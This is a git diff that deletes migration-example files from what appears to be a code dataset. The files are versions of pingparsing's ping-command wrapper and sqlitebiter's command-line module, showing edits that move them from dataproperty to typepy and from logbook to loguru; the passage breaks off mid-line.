-        Hostname/IP-address to sending ICMP packets.
-
-    .. py:attribute:: waittime
-
-        Time [sec] for sending packets.
-        If the value is ``None``, sending packets time will be the same as
-        built-in ``ping`` command.
-        Defaults to 1 [sec].
-
-    .. py:attribute:: count
-
-        Number of sending ICMP packets.
-        The value will be ignored if the value is ``None``.
-        Defaults to ``None``.
-
-    .. py:attribute:: ping_option
-
-        Additional ``ping`` command option.
-
-    .. py:attribute:: auto_codepage
-
-        [Only for windows environment] Automatically change code page if
-        ``True``. Defaults to ``True``.
-    """
-
-    def __init__(self):
-        self.destination_host = ""
-        self.waittime = 1
-        self.count = None
-        self.ping_option = ""
-        self.auto_codepage = True
-
-    def ping(self):
-        """
-        Sending ICMP packets.
-
-        :return: ``ping`` command execution result.
-        :rtype: :py:class:`.PingResult`
-        :raises ValueError: If parameters not valid.
-        """
-
-        import subprocess
-
-        self.__validate_ping_param()
-
-        command_list = self.__get_base_ping_command()
-
-        if dp.is_not_empty_string(self.ping_option):
-            command_list.append(self.ping_option)
-
-        command_list.append(self.__get_waittime_option())
-        command_list.append(self.__get_count_option())
-
-        ping_proc = subprocess.Popen(
-            " ".join(command_list), shell=True,
-            stdout=subprocess.PIPE, stderr=subprocess.PIPE)
-        stdout, stderr = ping_proc.communicate()
-
-        return PingResult(stdout, stderr, ping_proc.returncode)
-
-    def __validate_ping_param(self):
-        if dp.is_empty_string(self.destination_host):
-            raise ValueError("required destination_host")
-
-        self.__validate_waittime()
-        self.__validate_count()
-
-    def __validate_waittime(self):
-        if self.waittime is None:
-            return
-
-        waittime = dp.IntegerType(self.waittime).try_convert()
-        if waittime is None:
-            raise ValueError("wait time must be an integer: actual={}".format(
-                self.waittime))
-
-        if waittime <= 0:
-            raise ValueError("wait time must be greater than zero")
-
-    def __validate_count(self):
-        if self.count is None:
-            return
-
-        count = dp.IntegerType(self.count).try_convert()
-        if count is None:
-            raise ValueError("count must be an integer: actual={}".format(
-                self.count))
-
-        if count <= 0:
-            raise ValueError("count must be greater than zero")
-
-    def __get_base_ping_command(self):
-        command_list = []
-
-        if platform.system() == "Windows" and self.auto_codepage:
-            command_list.append("chcp 437 &")
-
-        command_list.extend([
-            "ping",
-            self.destination_host,
-        ])
-
-        return command_list
-
-    def __get_waittime_option(self):
-        waittime = dp.IntegerType(self.waittime).try_convert()
-        if waittime is None:
-            return ""
-
-        if platform.system() == "Windows":
-            return "-n {:d}".format(waittime)
-        else:
-            return "-q -w {:d}".format(waittime)
-
-    def __get_count_option(self):
-        count = dp.IntegerType(self.count).try_convert()
-        if count is None:
-            return ""
-
-        if platform.system() == "Windows":
-            return "-n {:d}".format(count)
-        else:
-            return "-c {:d}".format(count)
diff --git a/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingtransmitter.py.target.py b/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingtransmitter.py.target.py
deleted file mode 100644
index e723029..0000000
--- a/v1/data/codefile/thombashi@pingparsing__45fac3c__pingparsing$_pingtransmitter.py.target.py
+++ /dev/null
@@ -1,166 +0,0 @@
-# encoding: utf-8
-
-"""
-.. codeauthor:: Tsuyoshi Hombashi
-"""
-
-from __future__ import absolute_import
-from collections import namedtuple
-import platform
-
-import typepy
-from typepy.type import Integer
-
-
-class PingResult(namedtuple("PingResult", "stdout stderr returncode")):
-    """
-    Data class to store ``ping`` command execution result.
-
-    .. py:attribute:: stdout
-
-        Standard output of ``ping`` command execution result.
-
-    .. py:attribute:: stderr
-
-        Standard error of ``ping`` command execution result.
-
-    .. py:attribute:: returncode
-
-        Return code of ``ping`` command execution result.
-    """
-
-
-class PingTransmitter(object):
-    """
-    Transmitter class to send ICMP packets by using the OS built-in ``ping``
-    command.
-
-    .. py:attribute:: destination_host
-
-        Hostname/IP-address to sending ICMP packets.
-
-    .. py:attribute:: waittime
-
-        Time [sec] for sending packets.
-        If the value is ``None``, sending packets time will be the same as
-        built-in ``ping`` command.
-        Defaults to 1 [sec].
-
-    .. py:attribute:: count
-
-        Number of sending ICMP packets.
-        The value will be ignored if the value is ``None``.
-        Defaults to ``None``.
-
-    .. py:attribute:: ping_option
-
-        Additional ``ping`` command option.
-
-    .. py:attribute:: auto_codepage
-
-        [Only for windows environment] Automatically change code page if
-        ``True``. Defaults to ``True``.
-    """
-
-    def __init__(self):
-        self.destination_host = ""
-        self.waittime = 1
-        self.count = None
-        self.ping_option = ""
-        self.auto_codepage = True
-
-    def ping(self):
-        """
-        Sending ICMP packets.
-
-        :return: ``ping`` command execution result.
-        :rtype: :py:class:`.PingResult`
-        :raises ValueError: If parameters not valid.
- """ - - import subprocess - - self.__validate_ping_param() - - command_list = self.__get_base_ping_command() - - if typepy.is_not_null_string(self.ping_option): - command_list.append(self.ping_option) - - command_list.append(self.__get_waittime_option()) - command_list.append(self.__get_count_option()) - - ping_proc = subprocess.Popen( - " ".join(command_list), shell=True, - stdout=subprocess.PIPE, stderr=subprocess.PIPE) - stdout, stderr = ping_proc.communicate() - - return PingResult(stdout, stderr, ping_proc.returncode) - - def __validate_ping_param(self): - if typepy.is_null_string(self.destination_host): - raise ValueError("required destination_host") - - self.__validate_waittime() - self.__validate_count() - - def __validate_waittime(self): - if self.waittime is None: - return - - try: - waittime = Integer(self.waittime).convert() - except typepy.TypeConversionError: - raise ValueError("wait time must be an integer: actual={}".format( - self.waittime)) - - if waittime <= 0: - raise ValueError("wait time must be greater than zero") - - def __validate_count(self): - if self.count is None: - return - - try: - count = Integer(self.count).convert() - except typepy.TypeConversionError: - raise ValueError("count must be an integer: actual={}".format( - self.count)) - - if count <= 0: - raise ValueError("count must be greater than zero") - - def __get_base_ping_command(self): - command_list = [] - - if platform.system() == "Windows" and self.auto_codepage: - command_list.append("chcp 437 &") - - command_list.extend([ - "ping", - self.destination_host, - ]) - - return command_list - - def __get_waittime_option(self): - try: - waittime = Integer(self.waittime).convert() - except typepy.TypeConversionError: - return "" - - if platform.system() == "Windows": - return "-n {:d}".format(waittime) - else: - return "-q -w {:d}".format(waittime) - - def __get_count_option(self): - try: - count = Integer(self.count).convert() - except typepy.TypeConversionError: - return "" - - if platform.system() == "Windows": - return "-n {:d}".format(count) - else: - return "-c {:d}".format(count) diff --git a/v1/data/codefile/thombashi@sqlitebiter__26c8e74__sqlitebiter$sqlitebiter.py.diff b/v1/data/codefile/thombashi@sqlitebiter__26c8e74__sqlitebiter$sqlitebiter.py.diff deleted file mode 100644 index 8a7cc83..0000000 --- a/v1/data/codefile/thombashi@sqlitebiter__26c8e74__sqlitebiter$sqlitebiter.py.diff +++ /dev/null @@ -1,53 +0,0 @@ -diff --git a/sqlitebiter/sqlitebiter.py b/sqlitebiter/sqlitebiter.py - index 462720ea03ad59e8288ba75d634caa3e23d54c79..26c8e7467fb764d6abca03d6830f7679cbfc3ea1 100644 - --- a/sqlitebiter/sqlitebiter.py - +++ b/sqlitebiter/sqlitebiter.py -@@ -10,11 +10,11 @@ from __future__ import absolute_import - import sys - - import click --import dataproperty - import logbook - import path - import simplesqlite - from sqliteschema import SqliteSchemaExtractor -+import typepy - - import pytablereader as ptr - -@@ -43,7 +43,7 @@ def create_database(ctx, database_path): - - db_path = path.Path(database_path) - dir_path = db_path.dirname() -- if dataproperty.is_not_empty_string(dir_path): -+ if typepy.is_not_null_string(dir_path): - dir_path.makedirs_p() - - if is_append_table: -@@ -133,7 +133,7 @@ def file(ctx, files, output_path): - to a SQLite database file. 
- """ - -- if dataproperty.is_empty_sequence(files): -+ if typepy.is_empty_sequence(files): - sys.exit(ExitCode.NO_INPUT) - - con = create_database(ctx, output_path) -@@ -224,7 +224,7 @@ def url(ctx, url, format_name, output_path, encoding, proxy): - Scrape tabular data from a URL and convert data to a SQLite database file. - """ - -- if dataproperty.is_empty_sequence(url): -+ if typepy.is_empty_sequence(url): - sys.exit(ExitCode.NO_INPUT) - - con = create_database(ctx, output_path) -@@ -236,7 +236,7 @@ def url(ctx, url, format_name, output_path, encoding, proxy): - _setup_logger(logger, ctx.obj[Context.LOG_LEVEL]) - - proxies = {} -- if dataproperty.is_not_empty_string(proxy): -+ if typepy.is_not_null_string(proxy): - proxies = { - "http": proxy, - "https": proxy, diff --git a/v1/data/codefile/thombashi@sqlitebiter__26c8e74__sqlitebiter$sqlitebiter.py.source.py b/v1/data/codefile/thombashi@sqlitebiter__26c8e74__sqlitebiter$sqlitebiter.py.source.py deleted file mode 100644 index 41f225e..0000000 --- a/v1/data/codefile/thombashi@sqlitebiter__26c8e74__sqlitebiter$sqlitebiter.py.source.py +++ /dev/null @@ -1,341 +0,0 @@ -#!/usr/bin/env python -# encoding: utf-8 - -""" -.. codeauthor:: Tsuyoshi Hombashi -""" - -from __future__ import absolute_import - -import sys - -import click -import dataproperty -import logbook -import path -import simplesqlite -from sqliteschema import SqliteSchemaExtractor - -import pytablereader as ptr - -from ._counter import ResultCounter -from ._enum import ( - Context, - ExitCode, -) -from ._version import VERSION - - -CONTEXT_SETTINGS = dict( - help_option_names=["-h", "--help"], - obj={}, -) -MAX_VERBOSITY_LEVEL = 2 -QUIET_LOG_LEVEL = logbook.NOTSET - -logbook.StderrHandler( - level=logbook.DEBUG, - format_string='[{record.level_name}] {record.message}').push_application() - - -def create_database(ctx, database_path): - is_append_table = ctx.obj.get(Context.IS_APPEND_TABLE) - - db_path = path.Path(database_path) - dir_path = db_path.dirname() - if dataproperty.is_not_empty_string(dir_path): - dir_path.makedirs_p() - - if is_append_table: - return simplesqlite.SimpleSQLite(db_path, "a") - else: - return simplesqlite.SimpleSQLite(db_path, "w") - - -def write_completion_message(logger, database_path, result_counter): - logger.debug(u"----- sqlitebiter completed -----") - logger.debug(u"database path: {:s}".format(database_path)) - logger.debug(u"number of created table: {:d}".format( - result_counter.success_count)) - logger.debug(u"") - - logger.debug(u"----- database schema -----") - logger.debug( - get_schema_extractor(database_path, MAX_VERBOSITY_LEVEL).dumps()) - - -def _setup_logger(logger, log_level): - ptr.set_log_level(log_level) - simplesqlite.set_log_level(log_level) - - if log_level == QUIET_LOG_LEVEL: - logger.disable() - - logger.level = log_level - - -def _get_format_type_from_path(file_path): - return file_path.ext.lstrip(".") - - -@click.group(context_settings=CONTEXT_SETTINGS) -@click.version_option(version=VERSION) -@click.option( - "--append", "is_append_table", is_flag=True, - help="append table(s) to existing database.") -@click.option("-v", "--verbose", "verbosity_level", count=True) -@click.option( - "--debug", "log_level", flag_value=logbook.DEBUG, - help="for debug print.") -@click.option( - "--quiet", "log_level", flag_value=QUIET_LOG_LEVEL, - help="suppress execution log messages.") -@click.pass_context -def cmd(ctx, is_append_table, verbosity_level, log_level): - ctx.obj[Context.IS_APPEND_TABLE] = is_append_table - 
ctx.obj[Context.VERBOSITY_LEVEL] = verbosity_level - ctx.obj[Context.LOG_LEVEL] = ( - logbook.INFO if log_level is None else log_level) - - -def get_schema_extractor(source, verbosity_level): - if verbosity_level >= MAX_VERBOSITY_LEVEL: - return SqliteSchemaExtractor( - source, verbosity_level=0, output_format="table") - - if verbosity_level >= 1: - return SqliteSchemaExtractor( - source, verbosity_level=3, output_format="text") - - if verbosity_level == 0: - return SqliteSchemaExtractor( - source, verbosity_level=0, output_format="text") - - raise ValueError("invalid verbosity_level: {}".format(verbosity_level)) - - -def get_success_log_format(verbosity_level): - if verbosity_level <= 1: - return u"convert '{:s}' to '{:s}' table" - - return u"convert '{:s}' to {:s}" - - -@cmd.command() -@click.argument("files", type=str, nargs=-1) -@click.option( - "-o", "--output-path", metavar="PATH", default="out.sqlite", - help="Output path of the SQLite database file") -@click.pass_context -def file(ctx, files, output_path): - """ - Convert tabular data within CSV/Excel/HTML/JSON/LTSV/Markdown/TSV file(s) - to a SQLite database file. - """ - - if dataproperty.is_empty_sequence(files): - sys.exit(ExitCode.NO_INPUT) - - con = create_database(ctx, output_path) - verbosity_level = ctx.obj.get(Context.VERBOSITY_LEVEL) - extractor = get_schema_extractor(con, verbosity_level) - result_counter = ResultCounter() - - logger = logbook.Logger("sqlitebiter file") - _setup_logger(logger, ctx.obj[Context.LOG_LEVEL]) - - for file_path in files: - file_path = path.Path(file_path) - if not file_path.isfile(): - logger.debug(u"file not found: {}".format(file_path)) - result_counter.inc_fail() - continue - - logger.debug(u"converting '{}'".format(file_path)) - - try: - loader = ptr.TableFileLoader(file_path) - except ptr.InvalidFilePathError as e: - logger.debug(e) - result_counter.inc_fail() - continue - except ptr.LoaderNotFoundError: - logger.debug( - u"loader not found that coincide with '{}'".format(file_path)) - result_counter.inc_fail() - continue - - try: - for tabledata in loader.load(): - sqlite_tabledata = ptr.SQLiteTableDataSanitizer( - tabledata).sanitize() - - try: - con.create_table_from_tabledata(sqlite_tabledata) - result_counter.inc_success() - except (ValueError, IOError) as e: - logger.debug( - u"path={}, message={}".format(file_path, e)) - result_counter.inc_fail() - continue - - log_message = get_success_log_format(verbosity_level).format( - file_path, - extractor.get_table_schema_text(sqlite_tabledata.table_name).strip()) - logger.info(log_message) - except ptr.OpenError as e: - logger.error(u"open error: file={}, message='{}'".format( - file_path, str(e))) - result_counter.inc_fail() - except ptr.ValidationError as e: - logger.error( - u"invalid {} data format: path={}, message={}".format( - _get_format_type_from_path(file_path), file_path, str(e))) - result_counter.inc_fail() - except ptr.InvalidDataError as e: - logger.error( - u"invalid {} data: path={}, message={}".format( - _get_format_type_from_path(file_path), file_path, str(e))) - result_counter.inc_fail() - - write_completion_message(logger, output_path, result_counter) - - sys.exit(result_counter.get_return_code()) - - -@cmd.command() -@click.argument("url", type=str) -@click.option( - "--format", "format_name", - type=click.Choice(ptr.TableUrlLoader.get_format_name_list()), - help="Data format to loading (defaults to html).") -@click.option( - "-o", "--output-path", metavar="PATH", default="out.sqlite", - help="Output path of the 
SQLite database file.") -@click.option( - "--encoding", type=str, metavar="ENCODING", default="utf-8", - help="Defaults to utf-8") -@click.option( - "--proxy", type=str, metavar="PROXY", - help="Specify a proxy in the form [user:passwd@]proxy.server:port.") -@click.pass_context -def url(ctx, url, format_name, output_path, encoding, proxy): - """ - Scrape tabular data from a URL and convert data to a SQLite database file. - """ - - if dataproperty.is_empty_sequence(url): - sys.exit(ExitCode.NO_INPUT) - - con = create_database(ctx, output_path) - verbosity_level = ctx.obj.get(Context.VERBOSITY_LEVEL) - extractor = get_schema_extractor(con, verbosity_level) - result_counter = ResultCounter() - - logger = logbook.Logger("sqlitebiter url") - _setup_logger(logger, ctx.obj[Context.LOG_LEVEL]) - - proxies = {} - if dataproperty.is_not_empty_string(proxy): - proxies = { - "http": proxy, - "https": proxy, - } - - try: - loader = ptr.TableUrlLoader( - url, format_name, encoding=encoding, proxies=proxies) - except ptr.LoaderNotFoundError as e: - try: - loader = ptr.TableUrlLoader( - url, "html", encoding=encoding, proxies=proxies) - except (ptr.LoaderNotFoundError, ptr.HTTPError): - logger.error(e) - sys.exit(ExitCode.FAILED_LOADER_NOT_FOUND) - except ptr.HTTPError as e: - logger.error(e) - sys.exit(ExitCode.FAILED_HTTP) - - try: - for tabledata in loader.load(): - sqlite_tabledata = ptr.SQLiteTableDataSanitizer( - tabledata).sanitize() - - try: - con.create_table_from_tabledata(sqlite_tabledata) - result_counter.inc_success() - except (ValueError) as e: - logger.debug( - u"url={}, message={}".format(url, str(e))) - result_counter.inc_fail() - continue - - log_message = get_success_log_format(verbosity_level).format( - url, - extractor.get_table_schema_text(sqlite_tabledata.table_name).strip()) - logger.info(log_message) - except ptr.InvalidDataError as e: - logger.error(u"invalid data: url={}, message={}".format(url, str(e))) - result_counter.inc_fail() - - write_completion_message(logger, output_path, result_counter) - - sys.exit(result_counter.get_return_code()) - - -@cmd.command() -@click.argument( - "credentials", type=click.Path(exists=True)) -@click.argument( - "title", type=str) -@click.option( - "-o", "--output-path", metavar="PATH", default="out.sqlite", - help="output path of the SQLite database file") -@click.pass_context -def gs(ctx, credentials, title, output_path): - """ - Convert a spreadsheet in Google Sheets to a SQLite database file. - - CREDENTIALS: OAuth2 Google credentials file. - TITLE: Title of the Google Sheets to convert. 
- """ - - con = create_database(ctx, output_path) - result_counter = ResultCounter() - - logger = logbook.Logger("sqlitebiter gs") - _setup_logger(logger, ctx.obj[Context.LOG_LEVEL]) - - loader = simplesqlite.loader.GoogleSheetsTableLoader() - loader.source = credentials - loader.title = title - - try: - for tabledata in loader.load(): - click.echo(u"convert '{:s}' to '{:s}' table".format( - title, tabledata.table_name)) - - try: - con.create_table_from_tabledata(tabledata) - result_counter.inc_success() - except (ptr.ValidationError, ptr.InvalidDataError): - result_counter.inc_fail() - except ptr.OpenError as e: - logger.error(e) - result_counter.inc_fail() - except AttributeError: - logger.error(u"invalid credentials data: path={}".format(credentials)) - result_counter.inc_fail() - except (ptr.ValidationError, ptr.InvalidDataError) as e: - logger.error( - u"invalid credentials data: path={}, message={}".format( - credentials, str(e))) - result_counter.inc_fail() - - write_completion_message(logger, output_path, result_counter) - - sys.exit(result_counter.get_return_code()) - - -if __name__ == '__main__': - cmd() diff --git a/v1/data/codefile/thombashi@sqlitebiter__26c8e74__sqlitebiter$sqlitebiter.py.target.py b/v1/data/codefile/thombashi@sqlitebiter__26c8e74__sqlitebiter$sqlitebiter.py.target.py deleted file mode 100644 index 9a3e3e4..0000000 --- a/v1/data/codefile/thombashi@sqlitebiter__26c8e74__sqlitebiter$sqlitebiter.py.target.py +++ /dev/null @@ -1,341 +0,0 @@ -#!/usr/bin/env python -# encoding: utf-8 - -""" -.. codeauthor:: Tsuyoshi Hombashi -""" - -from __future__ import absolute_import - -import sys - -import click -import logbook -import path -import simplesqlite -from sqliteschema import SqliteSchemaExtractor -import typepy - -import pytablereader as ptr - -from ._counter import ResultCounter -from ._enum import ( - Context, - ExitCode, -) -from ._version import VERSION - - -CONTEXT_SETTINGS = dict( - help_option_names=["-h", "--help"], - obj={}, -) -MAX_VERBOSITY_LEVEL = 2 -QUIET_LOG_LEVEL = logbook.NOTSET - -logbook.StderrHandler( - level=logbook.DEBUG, - format_string='[{record.level_name}] {record.message}').push_application() - - -def create_database(ctx, database_path): - is_append_table = ctx.obj.get(Context.IS_APPEND_TABLE) - - db_path = path.Path(database_path) - dir_path = db_path.dirname() - if typepy.is_not_null_string(dir_path): - dir_path.makedirs_p() - - if is_append_table: - return simplesqlite.SimpleSQLite(db_path, "a") - else: - return simplesqlite.SimpleSQLite(db_path, "w") - - -def write_completion_message(logger, database_path, result_counter): - logger.debug(u"----- sqlitebiter completed -----") - logger.debug(u"database path: {:s}".format(database_path)) - logger.debug(u"number of created table: {:d}".format( - result_counter.success_count)) - logger.debug(u"") - - logger.debug(u"----- database schema -----") - logger.debug( - get_schema_extractor(database_path, MAX_VERBOSITY_LEVEL).dumps()) - - -def _setup_logger(logger, log_level): - ptr.set_log_level(log_level) - simplesqlite.set_log_level(log_level) - - if log_level == QUIET_LOG_LEVEL: - logger.disable() - - logger.level = log_level - - -def _get_format_type_from_path(file_path): - return file_path.ext.lstrip(".") - - -@click.group(context_settings=CONTEXT_SETTINGS) -@click.version_option(version=VERSION) -@click.option( - "--append", "is_append_table", is_flag=True, - help="append table(s) to existing database.") -@click.option("-v", "--verbose", "verbosity_level", count=True) -@click.option( - 
"--debug", "log_level", flag_value=logbook.DEBUG, - help="for debug print.") -@click.option( - "--quiet", "log_level", flag_value=QUIET_LOG_LEVEL, - help="suppress execution log messages.") -@click.pass_context -def cmd(ctx, is_append_table, verbosity_level, log_level): - ctx.obj[Context.IS_APPEND_TABLE] = is_append_table - ctx.obj[Context.VERBOSITY_LEVEL] = verbosity_level - ctx.obj[Context.LOG_LEVEL] = ( - logbook.INFO if log_level is None else log_level) - - -def get_schema_extractor(source, verbosity_level): - if verbosity_level >= MAX_VERBOSITY_LEVEL: - return SqliteSchemaExtractor( - source, verbosity_level=0, output_format="table") - - if verbosity_level >= 1: - return SqliteSchemaExtractor( - source, verbosity_level=3, output_format="text") - - if verbosity_level == 0: - return SqliteSchemaExtractor( - source, verbosity_level=0, output_format="text") - - raise ValueError("invalid verbosity_level: {}".format(verbosity_level)) - - -def get_success_log_format(verbosity_level): - if verbosity_level <= 1: - return u"convert '{:s}' to '{:s}' table" - - return u"convert '{:s}' to {:s}" - - -@cmd.command() -@click.argument("files", type=str, nargs=-1) -@click.option( - "-o", "--output-path", metavar="PATH", default="out.sqlite", - help="Output path of the SQLite database file") -@click.pass_context -def file(ctx, files, output_path): - """ - Convert tabular data within CSV/Excel/HTML/JSON/LTSV/Markdown/TSV file(s) - to a SQLite database file. - """ - - if typepy.is_empty_sequence(files): - sys.exit(ExitCode.NO_INPUT) - - con = create_database(ctx, output_path) - verbosity_level = ctx.obj.get(Context.VERBOSITY_LEVEL) - extractor = get_schema_extractor(con, verbosity_level) - result_counter = ResultCounter() - - logger = logbook.Logger("sqlitebiter file") - _setup_logger(logger, ctx.obj[Context.LOG_LEVEL]) - - for file_path in files: - file_path = path.Path(file_path) - if not file_path.isfile(): - logger.debug(u"file not found: {}".format(file_path)) - result_counter.inc_fail() - continue - - logger.debug(u"converting '{}'".format(file_path)) - - try: - loader = ptr.TableFileLoader(file_path) - except ptr.InvalidFilePathError as e: - logger.debug(e) - result_counter.inc_fail() - continue - except ptr.LoaderNotFoundError: - logger.debug( - u"loader not found that coincide with '{}'".format(file_path)) - result_counter.inc_fail() - continue - - try: - for tabledata in loader.load(): - sqlite_tabledata = ptr.SQLiteTableDataSanitizer( - tabledata).sanitize() - - try: - con.create_table_from_tabledata(sqlite_tabledata) - result_counter.inc_success() - except (ValueError, IOError) as e: - logger.debug( - u"path={}, message={}".format(file_path, e)) - result_counter.inc_fail() - continue - - log_message = get_success_log_format(verbosity_level).format( - file_path, - extractor.get_table_schema_text(sqlite_tabledata.table_name).strip()) - logger.info(log_message) - except ptr.OpenError as e: - logger.error(u"open error: file={}, message='{}'".format( - file_path, str(e))) - result_counter.inc_fail() - except ptr.ValidationError as e: - logger.error( - u"invalid {} data format: path={}, message={}".format( - _get_format_type_from_path(file_path), file_path, str(e))) - result_counter.inc_fail() - except ptr.InvalidDataError as e: - logger.error( - u"invalid {} data: path={}, message={}".format( - _get_format_type_from_path(file_path), file_path, str(e))) - result_counter.inc_fail() - - write_completion_message(logger, output_path, result_counter) - - sys.exit(result_counter.get_return_code()) - - 
-@cmd.command() -@click.argument("url", type=str) -@click.option( - "--format", "format_name", - type=click.Choice(ptr.TableUrlLoader.get_format_name_list()), - help="Data format to loading (defaults to html).") -@click.option( - "-o", "--output-path", metavar="PATH", default="out.sqlite", - help="Output path of the SQLite database file.") -@click.option( - "--encoding", type=str, metavar="ENCODING", default="utf-8", - help="Defaults to utf-8") -@click.option( - "--proxy", type=str, metavar="PROXY", - help="Specify a proxy in the form [user:passwd@]proxy.server:port.") -@click.pass_context -def url(ctx, url, format_name, output_path, encoding, proxy): - """ - Scrape tabular data from a URL and convert data to a SQLite database file. - """ - - if typepy.is_empty_sequence(url): - sys.exit(ExitCode.NO_INPUT) - - con = create_database(ctx, output_path) - verbosity_level = ctx.obj.get(Context.VERBOSITY_LEVEL) - extractor = get_schema_extractor(con, verbosity_level) - result_counter = ResultCounter() - - logger = logbook.Logger("sqlitebiter url") - _setup_logger(logger, ctx.obj[Context.LOG_LEVEL]) - - proxies = {} - if typepy.is_not_null_string(proxy): - proxies = { - "http": proxy, - "https": proxy, - } - - try: - loader = ptr.TableUrlLoader( - url, format_name, encoding=encoding, proxies=proxies) - except ptr.LoaderNotFoundError as e: - try: - loader = ptr.TableUrlLoader( - url, "html", encoding=encoding, proxies=proxies) - except (ptr.LoaderNotFoundError, ptr.HTTPError): - logger.error(e) - sys.exit(ExitCode.FAILED_LOADER_NOT_FOUND) - except ptr.HTTPError as e: - logger.error(e) - sys.exit(ExitCode.FAILED_HTTP) - - try: - for tabledata in loader.load(): - sqlite_tabledata = ptr.SQLiteTableDataSanitizer( - tabledata).sanitize() - - try: - con.create_table_from_tabledata(sqlite_tabledata) - result_counter.inc_success() - except (ValueError) as e: - logger.debug( - u"url={}, message={}".format(url, str(e))) - result_counter.inc_fail() - continue - - log_message = get_success_log_format(verbosity_level).format( - url, - extractor.get_table_schema_text(sqlite_tabledata.table_name).strip()) - logger.info(log_message) - except ptr.InvalidDataError as e: - logger.error(u"invalid data: url={}, message={}".format(url, str(e))) - result_counter.inc_fail() - - write_completion_message(logger, output_path, result_counter) - - sys.exit(result_counter.get_return_code()) - - -@cmd.command() -@click.argument( - "credentials", type=click.Path(exists=True)) -@click.argument( - "title", type=str) -@click.option( - "-o", "--output-path", metavar="PATH", default="out.sqlite", - help="output path of the SQLite database file") -@click.pass_context -def gs(ctx, credentials, title, output_path): - """ - Convert a spreadsheet in Google Sheets to a SQLite database file. - - CREDENTIALS: OAuth2 Google credentials file. - TITLE: Title of the Google Sheets to convert. 
- """ - - con = create_database(ctx, output_path) - result_counter = ResultCounter() - - logger = logbook.Logger("sqlitebiter gs") - _setup_logger(logger, ctx.obj[Context.LOG_LEVEL]) - - loader = simplesqlite.loader.GoogleSheetsTableLoader() - loader.source = credentials - loader.title = title - - try: - for tabledata in loader.load(): - click.echo(u"convert '{:s}' to '{:s}' table".format( - title, tabledata.table_name)) - - try: - con.create_table_from_tabledata(tabledata) - result_counter.inc_success() - except (ptr.ValidationError, ptr.InvalidDataError): - result_counter.inc_fail() - except ptr.OpenError as e: - logger.error(e) - result_counter.inc_fail() - except AttributeError: - logger.error(u"invalid credentials data: path={}".format(credentials)) - result_counter.inc_fail() - except (ptr.ValidationError, ptr.InvalidDataError) as e: - logger.error( - u"invalid credentials data: path={}, message={}".format( - credentials, str(e))) - result_counter.inc_fail() - - write_completion_message(logger, output_path, result_counter) - - sys.exit(result_counter.get_return_code()) - - -if __name__ == '__main__': - cmd() diff --git a/v1/data/codefile/thombashi@sqlitebiter__311c7ce__sqlitebiter$sqlitebiter.py.diff b/v1/data/codefile/thombashi@sqlitebiter__311c7ce__sqlitebiter$sqlitebiter.py.diff deleted file mode 100644 index d47e1dd..0000000 --- a/v1/data/codefile/thombashi@sqlitebiter__311c7ce__sqlitebiter$sqlitebiter.py.diff +++ /dev/null @@ -1,142 +0,0 @@ -diff --git a/sqlitebiter/sqlitebiter.py b/sqlitebiter/sqlitebiter.py - index a5c4b66609c342b3b6e8cc777e64a32680f6e433..311c7ce50a89316d5cab9bb2daef05315175faf2 100644 - --- a/sqlitebiter/sqlitebiter.py - +++ b/sqlitebiter/sqlitebiter.py -@@ -12,13 +12,12 @@ import sys - from textwrap import dedent - - import click --import logbook --import logbook.more - import msgfy - import path - import pytablereader as ptr - import simplesqlite as sqlite - import typepy -+from loguru import logger - - from .__version__ import __version__ - from ._common import DEFAULT_DUP_COL_HANDLER -@@ -29,7 +28,7 @@ from .subcommand import FileConverter, GoogleSheetsConverter, UrlConverter - - - CONTEXT_SETTINGS = dict(help_option_names=["-h", "--help"], obj={}) --QUIET_LOG_LEVEL = logbook.NOTSET -+QUIET_LOG_LEVEL = "QUIET" - COMMAND_EPILOG = dedent( - """\ - Documentation: https://sqlitebiter.rtfd.io/ -@@ -58,39 +57,28 @@ def create_database(database_path, dup_table): - return (sqlite.SimpleSQLite(db_path, "w"), is_create_db) - - --def make_logger(channel_name, log_level): -- import appconfigpy -- -- logger = logbook.Logger(channel_name) -+def initialize_logger(name, log_level): -+ logger.remove() - - if log_level == QUIET_LOG_LEVEL: -- try: -- logger.disable() -- except AttributeError: -- logger.disabled = True # to support Logbook<1.0.0 -- -- logger.level = log_level -- ptr.set_log_level(log_level) -- sqlite.set_log_level(log_level) -- appconfigpy.set_log_level(log_level) -- -- return logger -- -+ logger.disable(name) -+ return - --def initialize_log_handler(log_level): -- from logbook.more import ColorizedStderrHandler -- -- debug_format_str = ( -- "[{record.level_name}] {record.channel} {record.func_name} " -- "({record.lineno}): {record.message}" -- ) -- if log_level == logbook.DEBUG: -- info_format_str = debug_format_str -+ if log_level == "DEBUG": -+ log_format = ( -+ "{level: <8} | " -+ "{name}:{function}:{line} - {message}" -+ ) - else: -- info_format_str = "[{record.level_name}] {record.channel}: {record.message}" -+ log_format = "[{level}] {message}" - -- 
ColorizedStderrHandler(level=logbook.DEBUG, format_string=debug_format_str).push_application() -- ColorizedStderrHandler(level=logbook.INFO, format_string=info_format_str).push_application() -+ logger.add( -+ sys.stdout, colorize=True, format=log_format, level=log_level, -+ ) -+ logger.enable(name) -+ ptr.set_logger(True) -+ sqlite.set_logger(True) -+ # appconfigpy.set_logger(True) - - - def finalize(con, converter, is_create_db): -@@ -178,7 +166,7 @@ def load_convert_config(logger, config_filepath, subcommand): - ) - @click.option("--replace-symbol", "symbol_replace_value", help="Replace symbols in attributes.") - @click.option("-v", "--verbose", "verbosity_level", count=True) --@click.option("--debug", "log_level", flag_value=logbook.DEBUG, help="For debug print.") -+@click.option("--debug", "log_level", flag_value="DEBUG", help="For debug print.") - @click.option( - "-q", - "--quiet", -@@ -209,7 +197,7 @@ def cmd( - ctx.obj[Context.TYPE_INFERENCE] = not no_type_inference - ctx.obj[Context.TYPE_HINT_HEADER] = is_type_hint_header - ctx.obj[Context.VERBOSITY_LEVEL] = verbosity_level -- ctx.obj[Context.LOG_LEVEL] = logbook.INFO if log_level is None else log_level -+ ctx.obj[Context.LOG_LEVEL] = "INFO" if log_level is None else log_level - - sqlite.SimpleSQLite.dup_col_handler = DEFAULT_DUP_COL_HANDLER - -@@ -242,8 +230,7 @@ def file(ctx, files, recursive, pattern, exclude, follow_symlinks, format_name, - file(s) or named pipes to a SQLite database file. - """ - -- initialize_log_handler(ctx.obj[Context.LOG_LEVEL]) -- logger = make_logger("{:s} file".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) -+ initialize_logger("{:s} file".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) - - if 